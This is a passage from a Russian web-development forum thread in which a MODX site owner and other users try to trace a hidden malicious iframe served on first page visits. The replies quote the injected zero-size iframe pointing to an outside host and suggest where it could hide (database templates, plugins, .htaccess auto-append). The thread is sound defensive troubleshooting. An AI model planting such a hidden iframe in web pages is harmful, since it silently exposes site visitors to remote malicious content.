Форум Сайтостроение Веб-строительство

Вирус на сайте

123 4
Posting_i_PIAR
На сайте с 03.02.2008
Offline
204
Posting_i_PIAR
#11

сделайте полный бэкап на дату раньше даты заражение.

поменяйте все пароли.

Услуги наполнения форумов (/ru/forum/882326) | групп ВК (https://smo-i-seo.ru/napolnenie-grupp-vkontakte) | комментирование (https://smo-i-seo.ru/posting-kommentirovanie-blogov) Копирайтинг (https://smo-i-seo.ru/uslugi-kopirajtinga) Настройка Директа (https://smo-i-seo.ru/zakazat-nastroyku-yandeks-direkt)
G6
На сайте с 12.07.2007
Online
161
garry69
#12

У вас стоит клкандер( при клике по картинке) или что то такое. Похоже подгружает от туда.

firefox19
На сайте с 05.11.2009
Offline
34
firefox19
#13

Зря игнорируете, проблема в скриптах, а точнее - в движке как минимум, и копать надо серьезно

Но дело хозяйское.

Ваши идеи - наша работа (http://yaweb.ru) Продам Сайт агентства недвижимости (/ru/forum/561489)
Agel Nash
На сайте с 01.12.2008
Offline
61
Agel Nash
#14
firefox19:
Зря игнорируете, проблема в скриптах, а точнее - в движке как минимум, и копать надо серьезно
Но дело хозяйское.

Если бы я игнорировал - я бы не создал эту тему.

garry69:
У вас стоит клкандер( при клике по картинке) или что то такое. Похоже подгружает от туда.

При клике на картинку ничего не должно стоять;-) Объясните аномальное поведение

Posting_i_PIAR:
сделайте полный бэкап на дату раньше даты заражение.
поменяйте все пароли.

Я бы с удовольствием сделал это, но вот откатиться в прошлое не могу по ряду причин. Тот бэкап что имеется (месяца 2 назад) не показал никаких изменений в файлах... В этом вся и странность...(

Дикий пионер:
Тоже поучаствую 

<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript" defer="defer"></script>

<noscript><div style="position:absolute"><img src="//mc.yandex.ru/watch/2716654" alt="" /></div></noscript>

<!-- /Yandex.Metrika counter --></div><div class="body">



<iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe>





<div class="headline">

<div class="logo"><h1>Видеокурсы</h1>обучение по видеоурокам</div>

Ищите откуда этот код выводится. Переводы строк добавил для лучшей видимости.

Кстати, фрейм есть только на первый заход, потом странички без него отдаются - так что какой-то скрипт у вас серверный этим руководит.

Спасибо. Теперь знаю в какую сторону копать.

P.S. Попробовал изменить шаблон переименовать body на bodys, а count на counts - все разъехалось, хотя CSS тоже поправил...

Просканировал файлы на сервере на наличие регулярок под тип body -> div, class body, и т.п. найдено 0 результатов. Просканировал файлы на наличие exec decode и т.п. - там тоже чисто...

я в панике.........

Я (http://agel-nash.ru) - вильгельм "ЗАКОЛЕБАТЕЛЬ" Аудит безопасности MODX сайтов (/ru/forum/783778) | Обучение созданию сайтов (http://modcoach.info/)
L
На сайте с 12.05.2009
Offline
13
Leadmonkey
#15

Та же ерунда. Сайт - voenhunt.ru при первом заходе на страницу есть вот это <iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe> в котором скрипт. При повторном заходе - пусто. Никак не могу понят, откуда эта дрянь выводится. В файлах на сервере ничего подобного нет

Agel Nash
На сайте с 01.12.2008
Offline
61
Agel Nash
#16
Leadmonkey:
Та же ерунда. Сайт - voenhunt.ru при первом заходе на страницу есть вот это <iframe src="http://ladygaga.ipq.co/index.php?tp=9f58b3191d33ba1b" width="0" height="0" frameborder="0"></iframe> в котором скрипт. При повторном заходе - пусто. Никак не могу понят, откуда эта дрянь выводится. В файлах на сервере ничего подобного нет

Сорри, ЛС не работает. Напши мне в ICQ 8608196

Посмотрел сайт: нас одинаковый движок. Сайты одинаковые - давай выяснять какие модули ставили.

У меня когда-то было предположение, что сайт хакнули через phpBB. После чего написал модуль ScanFiles.

ДП
На сайте с 23.11.2009
Offline
203
Дикий пионер
#17

В вашем движке куча всего хранится в базе - в том числе и шаблоны, смотрите базу, модули, плагины, сниппеты установленные.

Сделайте дамп базы и в нем поищите скрипты.

Agel Nash
На сайте с 01.12.2008
Offline
61
Agel Nash
#18
Дикий пионер:
В вашем движке куча всего хранится в базе - в том числе и шаблоны, смотрите базу, модули, плагины, сниппеты установленные.
Сделайте дамп базы и в нем поищите скрипты.

Базу смотрел.

Отключил все плагины кроме transAlias, (чтобы страницы из индекса не вылетели)

Из снппетов 90% моих - тоже были просмотренны и все чисты. Остальные 10% заменил на стандартные...

P.S. Думаю большего никто не подскажет. Дикий пионер скинь мне номер своего кошелька - оплачу время потраченое на меня, как и обещал (твои советы самые дельные).

ДП
На сайте с 23.11.2009
Offline
203
Дикий пионер
#19

Я по modX не большой спец, но посмотрел бы на плагины, которые подписаны на собфтия из категории

Template Service Events

Есть еще конечно экзотический вариант, что в htaccess как-то php_auto_append_file ставят, но в этом случае сам скрипт-то где-то тоже должен быть.

Agel Nash
На сайте с 01.12.2008
Offline
61
Agel Nash
#20
Дикий пионер:
Я по modX не большой спец, но посмотрел бы на плагины, которые подписаны на собфтия из категории
Template Service Events
Есть еще конечно экзотический вариант, что в htaccess как-то php_auto_append_file ставят, но в этом случае сам скрипт-то где-то тоже должен быть.

В htaccess чисто.

Из модулей стоит transAlias (стандартная поставка) на событие OnStripAlias

и RedirectMap на событие OnPageNotFound

Остается вариант лезть в код движка....

Хотя меня терзают смутные сомнения на счет того, что тут замешана яндекс.метрика

Ведь до того, как я поставил метрику все было чисто...

123 4

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий